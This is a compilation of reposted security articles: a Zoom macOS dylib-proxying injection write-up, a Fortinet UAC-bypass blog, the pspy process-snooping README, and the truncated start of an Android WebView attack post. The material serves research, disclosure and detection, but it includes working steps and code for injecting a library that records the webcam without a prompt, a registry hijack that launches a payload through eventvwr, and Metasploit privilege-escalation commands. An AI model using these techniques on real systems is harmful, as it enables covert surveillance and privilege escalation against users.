Zoom meetings, or worse, access the mic and camera at arbitrary times (without the user access prompt)! Modern macOS applications are compiled with a feature called the “Hardened Runtime”. This security enhancement is well documented by Apple, who note: "The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering." -Apple I’d like to think that Apple attended my 2016 at ZeroNights in Moscow, where I noted this feature would be a great addition to macOS: We can check that Zoom (or any application) is validly signed and compiled with the “Hardened Runtime” via the codesign utility: $ codesign -dvvv /Applications/zoom.us.app/ Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us Identifier=us.zoom.xos Format=app bundle with Mach-O thin (x86_64) CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded ... Authority=Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3) Authority=Developer ID Certification Authority Authority=Apple Root CA A flags value of 0x10000(runtime) indicates that the application was compiled with the “Hardened Runtime” option, and thus said runtime, should be enforced by macOS for this application. Ok so far so good! Code injection attacks should be generically thwarted due to this! …but (again) this is Zoom, so not so fast 😅 Let’s dump Zoom’s entitlements (entitlements are code-signed capabilities and/or exceptions), again via the codesign utility: codesign -d --entitlements :- /Applications/zoom.us.app/ Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN...> <plist version="1.0"> <dict> <key>com.apple.security.automation.apple-events</key> <true/> <key>com.apple.security.device.audio-input</key> <true/> <key>com.apple.security.device.camera</key> <true/> <key>com.apple.security.cs.disable-library-validation</key> <true/> <key>com.apple.security.cs.disable-executable-page-protection</key> <true/> </dict> </plist> The com.apple.security.device.audio-input and com.apple.security.device.camera entitlements are required as Zoom needs (user-approved) mic and camera access. However the com.apple.security.cs.disable-library-validation entitlement is interesting. In short it tells macOS, “hey, yah I still (kinda?) want the “Hardened Runtime”, but please allow any libraries to be loaded into my address space” …in other words, library injections are a go! Apple documents this entitlement as well: So, thanks to this entitlement we can (in theory) circumvent the “Hardened Runtime” and inject a malicious library into Zoom (for example to access the mic and camera without an access alert). There are variety of ways to coerce a remote process to load a dynamic library at load time, or at runtime. Here we’ll focus on a method I call “dylib proxying”, as it’s both stealthy and persistent (malware authors, take note!). In short, we replace a legitimate library that the target (i.e. Zoom) depends on, then, proxy all requests made by Zoom back to the original library, to ensure legitimate functionality is maintained. Both the app, and the user remains none the wiser! 📝 Another benefit of the "dylib proxying" is that it does not compromise the code signing certificate of the binary (however, it may affect the signature of the application bundle). A benefit of this, is that Apple's runtime signature checks (e.g. for mic & camera access) do not seem to detect the malicious library, and thus still afford the process continued access to the mic & camera. This is a method I’ve often (ab)used before in a handful of exploits, for example to (previously) bypass SIP: As the image illustrates one could proxied the IASUtilities library so that malicious code would be automatically loaded (‘injected’) by the macOS dynamic linker (dyld) into Apple’s installer (a prerequisite for the SIP bypass exploit). Here, we’ll similarly proxy a library (required by Zoom), such that our malicious library will be automatically loaded into Zoom’s trusted process address space any time its launched. To determine what libraries Zoom is linked against (read: requires), and thus will be automatically loaded by the macOS dynamic loader, we can use the otool with the -L flag: $ otool -L /Applications/zoom.us.app/Contents/MacOS/zoom.us /Applications/zoom.us.app/Contents/MacOS/zoom.us: @rpath/curl64.framework/Versions/A/curl64 /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation /usr/lib/libobjc.A.dylib /usr/lib/libc++.1.dylib /usr/lib/libSystem.B.dylib /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices 📝 Due to macOS's System Integrity Protection (SIP), we cannot replace any system libraries. As such, for an application to be ‘vulnerable’ to “dylib proxying” it must load a library from either its own application bundle, or another non-SIP’d location (and must not be compiled with the “hardened runtime” (well unless it has the com.apple.security.cs.disable-library-validation entitlement exception)). Looking at the Zoom’s library dependencies, we see: @rpath/curl64.framework/Versions/A/curl64. We can resolve the runpath (@rpath) again via otool, this time with the -l flag: $ otool -l /Applications/zoom.us.app/Contents/MacOS/zoom.us ... Load command 22 cmd LC_RPATH cmdsize 48 path @executable_path/../Frameworks (offset 12) The @executable_path will be resolved at runtime to the binary’s path, thus the dylib will be loaded out of: /Applications/zoom.us.app/Contents/MacOS/../Frameworks, or more specifically /Applications/zoom.us.app/Contents/Frameworks. Taking a peak at Zoom’s application bundle, we can confirm the presence of the curl64 (and many other frameworks and libraries) that will all be loaded whenever Zoom is launched: 📝 For details on "runpaths" (@rpath) and executable paths (@executable_path) as well as more information on creating a proxy dylib, check out my paper: "Dylib Hijacking on OS X" For simplicity sake, we’ll target Zoom’s libssl.1.0.0.dylib (as it’s a stand-alone library, versus a framework/bundle) as the library we’ll proxy. Step #1 is to rename the legitimate library. For example here, we simply prefix it with an underscore: _libssl.1.0.0.dylib Now, if we running Zoom, it will (as expected) crash, as a library it requires (libssl.1.0.0.dylib) is ‘missing’: patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us dyld: Library not loaded: @rpath/libssl.1.0.0.dylib Referenced from: /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64 Reason: image not found Abort trap: 6 This is actually good news, as it means if we place any library named libssl.1.0.0.dylib in Zoom’s Frameworks directory dyld will (blindly) attempt to load it. Step #2, let’s create a simple library, with a custom constructor (that will be automatically invoked when the library is loaded): 1__attribute__((constructor)) 2static void constructor(void) 3{ 4 char path[PROC_PIDPATHINFO_MAXSIZE]; 5 proc_pidpath (getpid(), path, sizeof(path)-1); 6 7 NSLog(@"zoom zoom: loaded in %d: %s", getpid(), path); 8 9 return; 10} …and save it to /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib. Then we re-run Zoom: patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us zoom zoom: loaded in 39803: /Applications/zoom.us.app/Contents/MacOS/zoom.us Hooray! Our library is loaded by Zoom. Unfortunately Zoom then exits right away. This is also not unexpected as our libssl.1.0.0.dylib is not an ssl library…that is to say, it doesn’t export any required functionality (i.e. ssl capabilities!). So Zoom (gracefully) fails. Not to worry, this is where the beauty of “dylib proxying” shines. Step #3, via simple linker directives, we can tell Zoom, “hey, while our library don’t implement the required (ssl) functionality you’re looking for, we know who does!” and then point Zoom to the original (legitimate) ssl library (that we renamed _libssl.1.0.0.dylib). Diagrammatically this looks like so: To create the required linker directive, we add the -XLinker -reexport_library and then the path to the proxy library target, under “Other Linker Flags” in Xcode: To complete the creation of the proxy library, we must also update the embedded reexport path (within our proxy dylib) so that it points to the (original, albeit renamed) ssl library. Luckily Apple provides the install_name_tool tool just for this purpose: patrick$ install_name_tool -change @rpath/libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib We can now confirm (via otool) that our proxy library references the original ssl libary. Specifically, we note that our proxy dylib (libssl.1.0.0.dylib) contains a LC_REEXPORT_DYLIB that points to the original ssl library (_libssl.1.0.0.dylib😞 patrick$ otool -l /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib ... Load command 11 cmd LC_REEXPORT_DYLIB cmdsize 96 name /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib time stamp 2 Wed Dec 31 14:00:02 1969 current version 1.0.0 compatibility version 1.0.0 Re-running Zoom confirms that our proxy library (and the original ssl library) are both loaded, and that Zoom perfectly functions as expected! 🔥 The appeal of injection a library into Zoom, revolves around its (user-granted) access to the mic and camera. Once our malicious library is loaded into Zoom’s process/address space, the library will automatically inherit any/all of Zooms access rights/permissions! This means that if the user as given Zoom access to the mic and camera (a more than likely scenario), our injected library can equally access those devices. 📝 If Zoom has not been granted access to the mic or the camera, our library should be able to problematically detect this (to silently 'fail'). …or we can go ahead and still attempt to access the devices, as the access prompt will originate “legitimately” from Zoom and thus likely to be approved by the unsuspecting user. To test this “access inheritance” I added some code to the injected library to record a few seconds of video off the webcam: 1 2 AVCaptureDevice* device = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo]; 3 4 session = [[AVCaptureSession alloc] init]; 5 output = [[AVCaptureMovieFileOutput alloc] init]; 6 7 AVCaptureDeviceInput *input = [AVCaptureDeviceInput deviceInputWithDevice:device 8 error:nil]; 9 10 movieFileOutput = [[AVCaptureMovieFileOutput alloc] init]; 11 12 [self.session addInput:input]; 13 [self.session addOutput:output]; 14 [self.session addOutput:movieFileOutput]; 15 16 [self.session startRunning]; 17 18 [movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"zoom.mov"] 19 recordingDelegate:self]; 20 21 //stop recoding after 5 seconds 22 [NSTimer scheduledTimerWithTimeInterval:5 target:self 23 selector:@selector(finishRecord:) userInfo:nil repeats:NO]; 24 25 ... Normally this code would trigger an alert from macOS, asking the user to confirm access to the (mic) and camera. However, as we’re injected into Zoom (which was already given access by the user), no additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video. Interestingly, the test captured the real brains behind this research: 📝 Could malware (ab)use Zoom to capture audio and video at arbitrary times (i.e. to spy on users?). If Zoom is installed and has been granted access to the mic and camera, then yes! In fact the /usr/bin/open utility supports the -j flag, which “launches the app hidden”! Voila! Conclusion Today, we uncovered two (local) security issues affecting Zoom’s macOS application. Given Zoom’s privacy and security track record this should surprise absolutely zero people. First, we illustrated how unprivileged attackers or malware may be able to exploit Zoom’s installer to gain root privileges. Following this, due to an ‘exception’ entitlement, we showed how to inject a malicious library into Zoom’s trusted process context. This affords malware the ability to record all Zoom meetings, or, simply spawn Zoom in the background to access the mic and webcam at arbitrary times! 😱 The former is problematic as many enterprises (now) utilize Zoom for (likely) sensitive business meetings, while the latter is problematic as it affords malware the opportunity to surreptitious access either the mic or the webcam, with no macOS alerts and/or prompts. OSX.FruitFly v2.0 anybody? So, what to do? Honestly, if you care about your security and/or privacy perhaps stop using Zoom. And if using Zoom is a must, I’ve written several free tools that may help detect these attacks. 😇 First, OverSight can alert you anytime anybody access the mic or webcam: Thus even if an attacker or malware is (ab)using Zoom “invisibly” in the background, OverSight will generate an alert. Another (free) tool is KnockKnock that can generically detect proxy libraries: …it’s almost as if offensive cyber-security research can facilitate the creation of powerful defensive tools! 🛠️ 😇 ❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page! © 2020 objective-see llc ✉ support us! Sursa: https://objective-see.com/blog/blog_0x56.html
-
Offense and Defense – A Tale of Two Sides: Bypass UAC By Anthony Giandomenico | April 01, 2020 FortiGuard Labs Threat Analysis Introduction In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence as it would happen in a real attack. Since I discussed downloading and executing a malicious payload with PowerShell last time, the next logical step is to focus on a technique for escalating privileges, which is why we will be focusing on the Bypass User Account Control (UAC) attack technique. Once the bad guys have managed to breach defenses and get into a system, they need to make sure they have the right permissions to complete whatever their tasks might be. One of the first obstacles they typically face is trying to bypass the UAC. It’s important to note that, while very common, Bypass UAC is a much weaker version of a Local Privilege Escalation attack. There are much more sophisticated exploits in the wild that allow for sandbox escapes or becoming a privileged system using a device owned by a least privileged user. But we will save those other topics for another day. User Account Control Review Before we start, we will all need a basic understanding of how UAC works. UAC is an access control feature introduced with Microsoft Windows Vista and Windows Server 2008 (and is included in pretty much all Windows versions after that). The main intent of UAC is to make sure applications are limited to standard user privileges. If a user requires an increase in access privileges, the administrator of the device (usually the owner) needs to authorize that change by actively selecting a prompt-based query. We all should be familiar with this user experience. When additional privileges are needed, a pop-up prompt asks, “Do you want to allow the following program to make changes to this computer?” If you have the full access token (i.e. you are logged in as the administrator of the device, or if you are part of the administrator’s group), you can select ‘yes’, and be on your way. If you’ve been assigned a standard user access token, however, you will be prompted to enter credentials for an administrator who does have the privileges. Figure 1. UAC Consent Prompt Figure 2. UAC Credential Prompt NOTE: When you first log in to a Windows 10 machine as a non-admin user, you are granted a standard access token. This token contains information about the level of access you are being granted, including SIDs and Windows privileges. The login process for an administrator is similar. They get the same standard token as the non-admin user, but they also get an additional token that provides admin access. This explains why an administrative user is still prompted with the UAC consent prompt even though they have appropriate access privilege. It’s because the system looks at the standard access token first. If you give your consent by selecting yes, the admin access token kicks in and you are on your merry way. The goal for this feature was that it would limit accidental system changes and malware from compromising a system, since elevating privilege required an additional user intervention to verify that this change is what the user was intending to do, and that only trusted apps would receive admin privileges. One other item that is important to understand is that Windows 10 protects processes by marking them with certain integrity levels. Below are the highest and lowest integrity levels. High Integrity (Highest) – apps that are assigned this level can make modifications to system data. Some executables may have auto-elevate abilities. I will dive into this later. Low Integrity (Lowest) - apps that perform a task that could be harmful to the operating system There is much more information available out there for the UAC feature, but I think what we have covered gives us the background we need to proceed. Bypass User Account Control The UAC feature seems like a good measure for preventing malware from compromising a system. But unfortunately, it turns out that criminals have discovered how to bypass the UAC feature, many of which that are pretty trivial. Many of them work on the specific configuration setting of UAC. Below are a few examples of UAC bypass techniques that have been built into the opensource Metasploit tool to help you test your systems. UAC protection bypass using Fodhelper or Eventvwr and the Registry Key UAC protection bypass using Eventvwr and the Registry Key UAC protection bypass using COM Handler Hijack The first two take advantage of auto-elevation within Microsoft. If a binary is trusted – meaning it has been signed with a MS certificate and is located in a trusted directory, like c:\windows\system32 – the UAC consent prompt will not engage. Both Fodhelper.exe and Eventvwr.exe are trusted binaries. In the Fodhelper example, when that executable is run it looks for two registry keys to run additional commands. One of those registry keys can be modified, so if you put custom commands in there they run at the privilege level of the trusted fodhelper.exe file. It’s worth mentioning that these techniques only work if the user is already in the administrator group. If you’re on a system as a standard user, it will not work. You might ask yourself, “why do I need to perform this bypass if I’m already an admin?” The answer is that if the adversary is on the box remotely, how do they select the yes button when the UAC consent prompt appears? They can’t, so the only way around it is to get around the prompt itself. The COM handler bypass is similar, as it references specific registry (COM hander) entries that can be created and then referenced when a high integrity process is loaded. On a side note, if you want to see which executables can auto-elevate, try using the strings program which is part of sysinternals: Example = Strings -sc:\windows\system32\*.exe | findstr /I autoelevate As I mentioned, there are many more bypass UAC techniques. If you want to explore more, which I think you should do to ensure you’re protected against them, or at least can detect them, you can start at this GitHub site (UACMe). Defenses against Bypass UAC Now that we understand that bypassing the UAC controls is possible, let’s talk about defenses you have against these attacks. You have four settings for User Account Control in Windows 7/10. The settings options are listed below. Always notify Probably the most secure setting. If you select this, it will always notify you when you make changes to your system, such as installing software programs or when you are making direct changes to Windows settings. When the UAC prompt is displayed, other tasks are frozen until you respond. Notify me only when programs try to make changes to my computer This setting is similar to the first. It will notify when installing software programs and will freeze all other tasks until you respond to the prompt. However, it will not notify you when you try to modify changes to the system. Notify me only when programs try to make changes to my computer (do not dim my desktop) As the setting name suggests, it’s the same as the one above. But when the UAC consent prompt appears, other tasks on the system will not freeze. Never notify (Disable UAC) I think it’s obvious what this setting does. It disables User Access Control. The default setting for UAC is “Notify me only when programs try to make changes to my computer.” I mention this because some attack techniques will not work if you have UAC set to “Always notify.” A word to the wise. Another great defense for this technique is to simply not run as administrator. Even if you own the device, work as a standard user and elevate privileges as needed when performing tasks that require them. This sounds like a no-brainer, but many organizations still provide admin privileges to all users. The reasoning is usually because it’s easier. That’s true, but it’s also easier for the bad guys as well. Privilege escalation never really happens as a single event. They are multiple techniques chained together, with the next dependent on the one before successfully executing. So with that in mind, the best way to break the attack chain is to prevent any of these techniques from successfully completing – and the best place to do this is usually by blocking a technique in the execution tactic category or before when being delivered. If the adversary cannot get a foothold on the box, they certainly are not going to be able to execute a bypass UAC technique. If you’re interested in learning more about technique chaining and dependencies, Andy Applebaum created a nice presentation given at the First Conference that you might want to take a look at. One common question people ask is, “why are there no CVEs for theseUAC security bypass attacks?” It’s because Microsoft doesn’t consider UAC to be a security bypass, so you will not see them in the regular patch Tuesdays. Real-World Examples & Detections Over the years, our FortiGuard Labs team has discovered many threats that include a bypass UAC technique. A great example is a threat we discovered a few years back that contained the Fareit malware. A Fareit payload typically includes stealing credentials and downloading other payloads. This particular campaign run was delivered via a phishing email containing a malicious macro that called a PowerShell script to download a file named sick.exe. This seems like a typical attack strategy, but to execute the sick.exe payload it used the high integrity (auto-elevated) eventvwr.exe to bypass the UAC consent prompt. Below is the PowerShell script. Figure 3. PowerShell Script You can see that the first part of the script downloads the malicious file using the (New-object System.net.webclient).Downloadfile() method we discussed in the first blog in this series. The second part of the script adds an entry to the registry using the command reg add HKCU\Software\Classes\mscfile\shell\open\command /d %tmp%\sick.exe /f. Figure 4. Registry Modified by PowerShell Script Finally, the last command in the script runs the eventvwr.exe, which needs to run MMC. As I discussed earlier, the exe has to query both the HKCU\Software\Classes\mscfile\shell\open\command\ and HKCR\mscfile\shell\open\command\. When it does so, it will find sick.exe as an entry and will execute that instead of the MMC. Our 24/7 FortiResponder Managed Detection and Response team also sees a good amount of bypass UAC activity in our customers’ environments. Usually, the threat is stopped earlier in the attack chain, before it has a chance to run the technique, but there are occasions when it is able to progress beyond that point. We also observe it if the FortiEDR configuration is in simulation mode. A recent technique we detected and blocked was a newer version of Trickbot. When this payload runs it tries to execute the WSReset UAC Bypass technique to circumvent the UAC prompt. Once again, it leverages an executable that has higher integrity (and higher privilege) and has the autoElevate property enabled. This specific bypass works on Windows 10. If the payload encounters Windows 7, it will instead use the CMSTPUA UAC bypass technique. In Figure 5 you can see our FortiEDR forensic technology identify the reg.exe trying to modify the registry value with DelegateExecute. Figure 5. FortiEDR technology detecting a bypass UAC technique Our FortiSIEM customers can take advantage of rules to detect some of these UAC bypass techniques. Below is an example rule to detect a UAC bypass using the Windows backup tool sdclt.exe and the Eventvwr version we mentioned before. Figure 6. FortiSIEM rule to detect some Bypass UAC techniques Below, in Figure 7, we can see the sub-patterns for the rule detecting the eventvwr Bypass UAC version. Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe If you’re not using a technology like FortiEDR or FortiSIEM, you could start monitoring on your own (using sysmon). But again, it could be difficult since there are so many variations. In general, you can look for registry changes or additions in certain areas and the auto-elevated files being used, depending on the specific bypass UAC technique. For the eventvwr.exe version you could look for new entries in HKCU\SoftwarClasses. Also keep an eye on the consent.exe file since it’s the one that launches the User Interface for UAC. Look for the amount of time it takes for the start and end time of the consent process. If it’s milliseconds, it’s not being done by a human but an automated process. Lastly, when looking at the entire UAC process, a legitimate execution is usually much simpler in nature, whereas the bypass UAC process is a bit more complex or noisy in the logs. You will have to do a lot of research to figure out the right rules to trigger on. It’s probably better to just get a technology that can help prevent or detect the technique. This should save you a lot of time and personnel overhead. Reproducing the Techniques Once you’ve done your research on the technique, it’s time to figure out how to reproduce it so you can figure out whether or not you detect it. Some of the same tools apply as I mentioned last time, but there are a few that are fairly easy to use. Below are a few examples. Simulation Tool Atomic Red Team has some very basic tests you can use to simulate a UAC bypass. Figure 8, below, lists them. Figure 8. A list of Bypass UAC tests Open Source Defense Testing Tool As I mentioned earlier, Metasploit has a few bypass UAC techniques you can leverage. Remember that in the attack chain your adversary already has an initial foothold on the box, and they are trying to get around UAC. With that said, you should already have a meterpreter session running on your test box. Executing the steps to run a bypass UAC (using fodhelper) technique is pretty simple. First, put your meterpreter session in the background by typing the command background. Next, type use exploit/windows/local/bypassuac_fodhelper. From there you need to add your meterpreter session to use the exploit. Type in set session <your session #> and then type exploit. If you’re successful, you should have something on your screen that looks like what’s shown in figure 9, below. Figure 9. Successful bypass UAC using fodhelper file. Lastly, in video 1 below, I walk you through a bypass UAC technique available in Metasploit. I had established initial access and ended up with a meterpreter session. From there I tried to add a registry for persistence, but don’t have the right access. So, I try to run the getsystem command, but that fails as well. This is usually because UAC is enabled. I then select one of the bypass UAC techniques, which then allows me to elevate my system privilege and add my persistence into the registry. Conclusion Once again, we continue play the cat and mouse game. As an industry we build protections (in this case UAC) and eventually the adversary finds ways around them. This will most likely not change. So the important task is understanding your strengths and weaknesses against these real-world attacks. If you struggle with keeping up to date with all of this, you can always turn to your consulting partner or vendor to make sure you have the right security controls and services in place to keep up with the latest threats, and that you are also able to address the risk and identify malicious activities using such tools as EDR, MDR, UEBA and SIEM technologies. I will close this blog like I did last time. As you go through the process of testing each Bypass UAC attack technique, it is important to not only understand the technique, but also be able to simulate it. Then, monitor your security controls, evaluate if any gaps exist, and document and make improvements needed for coverage. Stay tuned for our next Mitre ATT&CK technique blog - Credential Dumping. Find out more about how FortiResponder Services enable organizations to achieve continuous monitoring as well as incident response and forensic investigation. Learn how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems. Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief. Discover how the FortiGuard Security Rating Service provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization. Sursa: https://www.fortinet.com/blog/threat-research/offense-and-defense-a-tale-of-two-sides-bypass-uac.html
-
pspy - unprivileged Linux process snooping pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes. Getting started Download Get the tool onto the Linux machine you want to inspect. First get the binaries. Download the released binaries here: 32 bit big, static version: pspy32 download 64 bit big, static version: pspy64 download 32 bit small version: pspy32s download 64 bit small version: pspy64s download The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB). Build Either use Go installed on your system or run the Docker-based build process which ran to create the release. For the latter, ensure Docker is installed, and then run make build-build-image to build a Docker image, followed by make build to build the binaries with it. You can run pspy --help to learn about the flags and their meaning. The summary is as follows: -p: enables printing commands to stdout (enabled by default) -f: enables printing file system events to stdout (disabled by default) -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt). -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default). -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received. -c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID. --debug: prints verbose error messages which are otherwise hidden. The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it. Some more complex examples: # print both commands and file system events and scan procfs every 1000 ms (=1sec) ./pspy64 -pf -i 1000 # place watchers recursively in two directories and non-recursively into a third ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir # disable printing discovered commands but enable file system events ./pspy64 -p=false -f Examples Cron job watching To see the tool in action, just clone the repo and run make example (Docker needed). It is known passing passwords as command line arguments is not safe, and the example can be used to demonstrate it. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy run in foreground, as user myuser, and scans for processes. You should see output similar to this: ~/pspy (master) $ make example [...] docker run -it --rm local/pspy-example:latest [+] cron started [+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo) [+] Starting pspy now... Watching recursively : [/usr /tmp /etc /home /var /opt] (6) Watching non-recursively: [] (0) Printing: processes=true file-system events=false 2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches) 2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now 2018/02/18 21:00:03 CMD: UID=0 PID=9 | cron -f 2018/02/18 21:00:03 CMD: UID=0 PID=7 | sudo cron -f 2018/02/18 21:00:03 CMD: UID=1000 PID=14 | pspy 2018/02/18 21:00:03 CMD: UID=1000 PID=1 | /bin/bash /entrypoint.sh 2018/02/18 21:01:01 CMD: UID=0 PID=20 | CRON -f 2018/02/18 21:01:01 CMD: UID=0 PID=21 | CRON -f 2018/02/18 21:01:01 CMD: UID=0 PID=22 | python3 /root/scripts/password_reset.py 2018/02/18 21:01:01 CMD: UID=0 PID=25 | 2018/02/18 21:01:01 CMD: UID=??? PID=24 | ??? 2018/02/18 21:01:01 CMD: UID=0 PID=23 | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser 2018/02/18 21:01:01 CMD: UID=0 PID=26 | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root 2018/02/18 21:01:01 CMD: UID=101 PID=27 | 2018/02/18 21:01:01 CMD: UID=8 PID=28 | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk First, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in roots private crontab /var/spool/cron/crontabs/root, which executes this shell command (check crontab and script). Note that myuser can neither see the crontab nor the Python script. With pspy, it can see the commands nevertheless. CTF example from Hack The Box Below is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chmod (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse: How it works Tools exist to list all processes executed on Linux systems, including those that have finished. For instance there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec. These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU. A stealthier way is to use the following trick. Process tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, ... Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require priviledged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system. We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does. There is no guarantee you won't miss one, but chances seem to be good in my experiments. In general, the longer the processes run, the bigger the chance of catching them is. Misc Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" (link) Sursa: https://github.com/DominicBreuker/pspy
-
Android Webview Exploited How an android app can bypass CSP, iframe sandbox attributes, etc. to compromise the page getting loaded in the webview despite the classic protections in place. qreoct Read more posts by this author. qreoct 24 Mar 2020 • 20 min read There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become more prominent especially when javascript and/or the javascript interface is enabled on the webview. In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app. In many of the resources, that I came across, the situation was such that the victim was the underlying android app inside whose webview a page would open either from it's own domain or from an external source/domain. While attacker was the entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third party domain from where the page is being loaded inside the webview itself acting malicious). The attack vector was the vulnerable/malicious page loaded in the the webview. This blog talks about a different attack scenario! Victim: Not the underlying android app, but the page itself that is being loaded in the webview. Attacker: The underlying android app, in whose webview the page is being loaded. Attack vector: The vulnerable/malicious page loaded in the the webview.(through the abuse of the insecure implementations of some APIs) The story line A certain product needs to integrate with a huge business. Let us call this huge business as BullyGiant & the certain product as AppAwesome from this point on. Many users have an account on both AppAwesome & also on BullyGiant. The flow involves such users of BullyGiant to check out on their payments page with AppAwesome. Every transaction on AppAwesome requires to be authenticated & authorized by the user by entering their password on the AppAwesome's checkout page, which appears before any transaction is allowed to go through. AppAwesome cares about the security of it's customers. So it proposes the below security measures to anyone who wants to integrate with them, especially around AppAwesome's checkout page. Loading of the checkout page using AppAwesome's SDK. All of the page & it's contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience. Loading of the checkout page on the underlying browser (or custom chrome tabs, if available). This approach again has quite decent security (limited by of course the underlying browser's security) but not a very good user experience. Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although offers a better user experience than the second approach mentioned above. Now the deal is that AppAwesome is really very keen on securing their own customers' financial data & hence very strongly recommends usage of their SDK. BullyGiant on the other hand, for some reason, (hopefully justified) does not really want to abide by the secure integration proposals by AppAwesome. AppAwesome does have a choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to it's own users & in fact even more crucial for AppAwesome to stay in the game. So AppAwesome gives in & agrees to integrate with BullyGiant succumbing to their terms of integration, i.e. using the least secure webview approach. The only things that protect AppAwesome's customers now is the trust that AppAwesome has on BullyGiant, which is somewhat also covered through the legal contracts between AppAwesome & BullyGiant. That's all. Technical analysis (TL;DR) Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant Below is a tech analysis of why webview is a bad idea. It talks about how can a spurious (or compromised) app abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page, being loaded in the webview, might have implemented. We discuss in details, with many demos, how CSP, iframe sandbox etc. may be bypassed in android webview. Every single demo has a linked code base on my Github so they could be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog: A simple demo of the underlying concepts on the browser & android webview Addition of security features to the underlying concepts & then demo of the same on the browser & android webview NB: Please ignore all other potential security issues that might be there with the code base/s Case 1: No protection mechanisms Apps used in this section: AppAwesome BullyGiant AppAwesome when accessed from a normal browser: Vanilla AppAwesome Landing Page - Browser And on submitting the above form: Vanilla AppAwesome Checkout Page -Browser AppAwesome when accessed from BullyGiant app: Vanilla AppAwesome Page - Android Webview Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app. And on submitting the form above: Vanilla AppAwesome Page - Android Webview Notice that 